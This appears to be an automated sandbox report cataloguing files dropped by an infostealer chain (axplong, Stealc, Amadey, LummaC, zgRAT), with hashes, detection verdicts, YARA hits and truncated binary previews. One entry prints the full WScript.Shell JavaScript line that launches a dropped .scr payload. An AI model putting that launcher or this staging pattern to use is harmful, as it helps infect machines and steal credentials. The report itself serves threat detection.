Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\mozglue[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	506368
Entropy (8bit):	5.884711667889521
Encrypted:	false
SSDEEP:	12288:G0Rr0R4h0h0mh0nzh02wy53Ih09s6MZEBe1SxHyVSSqDa7HV:BMuBe1MHyVSSqDa7
MD5:	6760374F17416485FA941B354D3DD800
SHA1:	D88389EC19AC3E87BC743BA3F8B7C518601FDBF9
SHA-256:	9DC31FBD03DA881700908423EB50C6B0C42C87FEC28E817449D3DD931802C9F5
SHA-512:	6E4D2F17CB93FE831198C2EAA35BF030D6A06D620645D3E1452C6BD6E77E42BAA9DC323FD60A2C5AE1D89124ADDE69972C489739D4BD73BA01B95B829A777EAB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\penis[1].exe, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....(...............0..>...z......>\... ...`....@.. ....................................@..................................[..K....`...v........................................................................... ............... ..H............text...D<... ...>.................. ..`.rsrc....v...`...x...@..............@..@.reloc..............................@..B................ \......H.......4S..............8...................................................(....(......(......(.....0...........s........~....%:....&~......&...s....%.....(...+o.....8[....o...............%..F~....(.....%..G~....(.....%..H~....(.....%..e~....(.....~....(.......o......8......(......s.......s........~....}....~...........s....(....o....}......{.....I~....(....o........9......I~....(.......8C........~....(....o....:......{....~....(....8......{....~....(.........(..........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\LummaC222222[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	6.667690093536603
Encrypted:	false
SSDEEP:	6144:yEIbJdhhk012D9kEsrwRdvwoShfvM4MH0RoeAcGho33vXvIKgI5TdFaA51TIrxLD:yEIbJvhk0azddWtyA51C09ssEN8mhGfp
MD5:	2F1D09F64218FFFE7243A8B44345B27E
SHA1:	72553E1B3A759C17F54E7B568F39B3F8F1B1CDBE
SHA-256:	4A553C39728410EB0EBD5E530FC47EF1BDF4B11848A69889E8301974FC26CDE2
SHA-512:	5871E2925CA8375F3C3CE368C05EB67796E1FBEC80649D3CC9C39B57EE33F46476D38D3EA8335E2F5518C79F27411A568209F9F6EF38A56650C7436BBAA3F909
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 66%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...<..f..........................................@..........................@............@.....................................x................................H...................................................................................text.............................. ..`.rdata...).......*..................@..@.data...X........^..................@....reloc...H.......J...6..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\gold[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	320000
Entropy (8bit):	7.989223789389698
Encrypted:	false
SSDEEP:	6144:mmAUwI0Q3r6UBqC7e8O5rvH9MMoBfOWf6dX/mY9Row3:mmANIL3OUBqC7e15M/6d/Mw3
MD5:	389881B424CF4D7EC66DE13F01C7232A
SHA1:	D3BC5A793C1B8910E1ECC762B69B3866E4C5BA78
SHA-256:	9D1211B3869CA43840B7DA1677B257AD37521AAB47719C6FCFE343121760B746
SHA-512:	2B9517D5D9D972E8754A08863A29E3D3E3CFDE58E20D433C85546C2298AAD50AC8B069CAFD5ABB3C86E24263D662C6E1EA23C0745A2668DFD215DDBDFBD1AB96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..f............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......h...p...........................................................>I.....=NW...S.(..`}C..P?2...h..l.<A.I.....CN..../.u..T.......@.$.0..r..."_8)L...s.YQ..%./?...L..7e&[.z.....*..j..8J...sn.=..O...\|...n.....gUDG..HK....R.T...1Lz.....F..^l.y.{J..B\|...`.oH.3.....VN..f.}J.../.?.......4nE.S....3A..r.M..qf..{.....!IU../.M.?>......0.e..X.f...i.Ui....`.w..fa..Lwi.VM.i.4...i..J...p....s.]....)l.......0.i$\|..s....+.?..^(b\|zcb.N......v.dG.e..]. ..".<x.n...h[.Y

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\needmoney[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4278784
Entropy (8bit):	7.1283818624071476
Encrypted:	false
SSDEEP:	98304:if7X0ZueTTPs6deIF+iHtcbBt2VSFjUCaZ:8bPeVdeIMiHmbeVS
MD5:	7FA5C660D124162C405984D14042506F
SHA1:	69F0DFF06FF1911B97A2A0AA4CA9046B722C6B2F
SHA-256:	FD3EDFAFF77DD969E3E0D086495E4C742D00E111DF9F935ED61DFBA8392584B2
SHA-512:	D50848ADBFE75F509414ACC97096DAD191AE4CEF54752BDDDCB227FFC0F59BFD2770561E7B3C2A14F4A1423215F05847206AD5C242C7FD5B0655EDF513B22F6C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................8.....L.............@...........................A..................@..............................x"... ....7..................`..@............................P......................................................CODE................................ ..`DATA.... -..........................@...BSS......................................idata..x".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc..@....`......................@..P.rsrc.....7.. ....7.................@..P..............A......JA.............@..P........................................................................................................................................

C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\607698\Waters.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.708111754371502
Encrypted:	false
SSDEEP:	3:RiMIpGXIdPHo55wWAX+PKMEkD50jQIuMFEUjQI1K07Zo5uWAX+PKMEkD50jQIuMi:RiJBJHonwWDMkDOQIKUjQI1rywWDMkD/
MD5:	29C5DDC4ED9EED167D0A7223CE0B80BD
SHA1:	D9AB65479AE01705D19773DEF76A78246BE6C9FC
SHA-256:	066EF3E13AD6AB00730C65439CB8F59139E2047963C85424780C7C75BF8EC1D4
SHA-512:	12F7E908B9E96CEF77C74010DB1B60E9DF013C2A3E43B868FFAE4BEE77322C850E5E7E1BB5515F09E6073824989EEF94883ABC958E8CBC080E3DC142234FC571
Malicious:	false
Reputation:	unknown
Preview:	new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\QuantumDynamics Lab\\QuantumFlow.scr\" \"C:\\Users\\user\\AppData\\Local\\QuantumDynamics Lab\\W\"")

C:\Users\user\AppData\Local\QuantumDynamics Lab\QuantumFlow.scr

Download File

Process:	C:\Users\user\AppData\Local\Temp\607698\Waters.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.62028134425878
Encrypted:	false
SSDEEP:	12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
MD5:	18CE19B57F43CE0A5AF149C96AECC685
SHA1:	1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
SHA-256:	D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
SHA-512:	A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\QuantumDynamics Lab\W

Download File

Process:	C:\Users\user\AppData\Local\Temp\607698\Waters.pif
File Type:	data
Category:	dropped
Size (bytes):	813963
Entropy (8bit):	7.999769507096853
Encrypted:	true
SSDEEP:	12288:LtQJu7osksZQ7FuV65iFeG1bdMpX+rLvW6hwpos+s5E/RjyGF3tgO85c1XLwaMBO:LtOHrFuhF31iWB4zuNtIuXLuY9v1Pd
MD5:	7B5632DCD418BCBAE2A9009DBAF85F37
SHA1:	32AAF06166854718F0BCBB2F7173C2732CFB4D33
SHA-256:	361E9C3B62719B79BC280420B5F710E160FD55F2250BF605911DED7162483DB4
SHA-512:	C834E90CCF2D35529C294319B8E9A49DB7A7D67D0567E0739131D5AF51170DB32076D68147DC101F8047A75CB5B2275B25A9C8346A99A146A6798B9764316838
Malicious:	false
Reputation:	unknown
Preview:	\.;..'...$....v....F..Bas.H.>}.....w....#}3.t............p..P.<....3..-r\......(B...?.Z1..`..h0.8.......<.+^..u....WR......:..~t...J7j..k.U.;.n_Y...^...Z..So..U...(..m...I...:b..T<.@V.s....uW.....0)I.u.s..5..W...oB.Z.=U.!.....s1^It......S...e..+O.... .Q..3.(.....R.....V..W......\{y.l.+Y.%..zF......!N.]_.j..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R\|...F.:.'.F...h..................p.4.....p.4kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.W..,P..Myn.2..t.W.........&...q....... .4.....p.4m........px.5...x..2).U.j....>.p#...w..=......h?.X..B=...E..r.c...G=.g.E...'.t...+.._...[(.....Xo...9.H..)a.`.x>.........o..I..0..W.(.];EHV..d.U....^E.2.wM.D'r..z......9.

C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000002001\gold.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	320000
Entropy (8bit):	7.989223789389698
Encrypted:	false
SSDEEP:	6144:mmAUwI0Q3r6UBqC7e8O5rvH9MMoBfOWf6dX/mY9Row3:mmANIL3OUBqC7e15M/6d/Mw3
MD5:	389881B424CF4D7EC66DE13F01C7232A
SHA1:	D3BC5A793C1B8910E1ECC762B69B3866E4C5BA78
SHA-256:	9D1211B3869CA43840B7DA1677B257AD37521AAB47719C6FCFE343121760B746
SHA-512:	2B9517D5D9D972E8754A08863A29E3D3E3CFDE58E20D433C85546C2298AAD50AC8B069CAFD5ABB3C86E24263D662C6E1EA23C0745A2668DFD215DDBDFBD1AB96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g..f............................^.... ........@.. .......................@............`.....................................K............................ ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................@.......H.......h...p...........................................................>I.....=NW...S.(..`}C..P?2...h..l.<A.I.....CN..../.u..T.......@.$.0..r..."_8)L...s.YQ..%./?...L..7e&[.z.....*..j..8J...sn.=..O...\|...n.....gUDG..HK....R.T...1Lz.....F..^l.y.{J..B\|...`.oH.3.....VN..f.}J.../.?.......4nE.S....3A..r.M..qf..{.....!IU../.M.?>......0.e..X.f...i.Ui....`.w..fa..Lwi.VM.i.4...i..J...p....s.]....)l.......0.i$\|..s....+.?..^(b\|zcb.N......v.dG.e..]. ..".<x.n...h[.Y

C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	903168
Entropy (8bit):	7.997700688704897
Encrypted:	true
SSDEEP:	24576:9YroRg0QD2ZDvpSgezC2pSSqb9VAMsGm1ykciQgh75tT:9YroRmgSPC2MSpMsGmGiQg95t
MD5:	84263AB03B0A0F2B51CC11B93EC49C9F
SHA1:	E6457EB0E0131BEC70A2FD4D4A943314F0BD28D4
SHA-256:	7D6E4E01C452DD502361640EE095E2BEE35E3F55FD11EDC9E94C3580D2C132B5
SHA-512:	DB35A02345B5166077E300524675C523A8B4082FA62FC151C0797141348CAE5E173EEAEC5AD1E95556E048EA6ED34A78B90B1184420557C53CD91F351417EBB2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.f................................. ........@.. ....................... ............`.....................................W...................................\................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........................................................................k...(.Q...GQL..q.....Nqr.\.^v.E....<..@=...)!b.=qQ...B.c.....<.q.i. A.QE,T..~f.X3.....~..$.).(8t.........r.c@...i.2.?.-.8..-.....:...'I.`D...?/3?...WP.'...XLz....b.\| 2....*...\........B....Hg$3p.\|+s..K....Z.m.`....w..w.i.Vt..n.LL...d.`a.O..T.......#k.0D@d..8p.{.?Z..-..\W...,.(..P..&`L..?Z..J,y.:...9rY..........D;S.;..3..{..c...,Q........+bN.U.../E..O[....[..W...=..r..x.'...q.S".y.

C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	425984
Entropy (8bit):	6.513416731775012
Encrypted:	false
SSDEEP:	12288:ISqMakU3v+GYLWIjD9dSbvBG5u2uQjdQco:jq53v+G4Wwub8Ljaco
MD5:	F5D7B79EE6B6DA6B50E536030BCC3B59
SHA1:	751B555A8EEDE96D55395290F60ADC43B28BA5E2
SHA-256:	2F1AFF28961BA0CE85EA0E35B8936BC387F84F459A4A1D63D964CE79E34B8459
SHA-512:	532B17CD2A6AC5172B1DDBA1E63EDD51AB53A4527204415241E3A78E8FFEB9728071BDE5AE1EEFABEFD2627F00963F8A5458668CD7B8DF041C8683252FF56B46
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L......f............................E.............@.......................................@.................................D...................................<L......8...............................@............................................text............................... ..`.rdata..8...........................@..@.data...\|f... ...4..................@....rsrc................0..............@..@.reloc..<L.......N...2..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6608463
Entropy (8bit):	6.63150177563214
Encrypted:	false
SSDEEP:	49152:L7iMfyB4m8REZLzwo98xZtKWpn3XghJmU8YAsJ7GYp6UHBI0/0kB02hT6Px8UFF9:AZZbhT6Px8UFFpeA993PLgumY
MD5:	E17DD8E8ED9803018341037275960E16
SHA1:	90EFA4499A4F4F6A8E1D5F91F3A96E8E49B0E8AD
SHA-256:	7E3BA2AA30018F5B9AFF92A945F659768100D8AC1338AFAD49F092B17120A7A5
SHA-512:	127321309E7F30B2DF29A0303C8E0D4C86CF2513D24018A76AB051880B068862ED2F2EDB2B7E612D78668020D66C40CA4E26DBD64AD5ED73B02C597F5A4C5589
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.f..^..%.........#..G...Z...f...........G...@..........................`.......2e....... .........................B.... ...............................P...!...........................oH......................!...............................text...4.G.......G.................`.P`.data.........G.......G.............@.`..rdata........G.......G.............@.`@/4......$.....H......bH.............@.0@.bss....4.f.. L.......................`..edata..B.............K.............@.0@.idata....... ........K.............@.0..CRT....4....0........K.............@.0..tls.........@........K.............@.0..reloc...!...P..."....K.............@.0B/14...................Z.............@..B/29..................Z.............@..B/41.....XL...@...N....[.............@..B/55.....B.............\.............@..B/67.....T.............\.............@.0B/80.....a.............].

C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192000
Entropy (8bit):	6.395265378509869
Encrypted:	false
SSDEEP:	3072:QJlVTFj5qDao8KaxfE54HnnGSail+bOX8bX60UFHJKa:QJP5j5Ka2aOanGSabY860UFpKa
MD5:	7A02AA17200AEAC25A375F290A4B4C95
SHA1:	7CC94CA64268A9A9451FB6B682BE42374AFC22FD
SHA-256:	836799FD760EBA25E15A55C75C50B977945C557065A708317E00F2C8F965339E
SHA-512:	F6EBFE7E087AA354722CEA3FDDD99B1883A862FB92BB5A5A86782EA846A1BFF022AB7DB4397930BCABAA05CB3D817DE3A89331D41A565BC1DA737F2C5E3720B6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L......f.....................B"......d............@..........................0$...........@....................................<.............................#..$...................................................................................text...J........................... ....rdata..............................@..@.data....+!.........................@....reloc..*D....#..F..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4278784
Entropy (8bit):	7.1283818624071476
Encrypted:	false
SSDEEP:	98304:if7X0ZueTTPs6deIF+iHtcbBt2VSFjUCaZ:8bPeVdeIMiHmbeVS
MD5:	7FA5C660D124162C405984D14042506F
SHA1:	69F0DFF06FF1911B97A2A0AA4CA9046B722C6B2F
SHA-256:	FD3EDFAFF77DD969E3E0D086495E4C742D00E111DF9F935ED61DFBA8392584B2
SHA-512:	D50848ADBFE75F509414ACC97096DAD191AE4CEF54752BDDDCB227FFC0F59BFD2770561E7B3C2A14F4A1423215F05847206AD5C242C7FD5B0655EDF513B22F6C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Reputation:	unknown
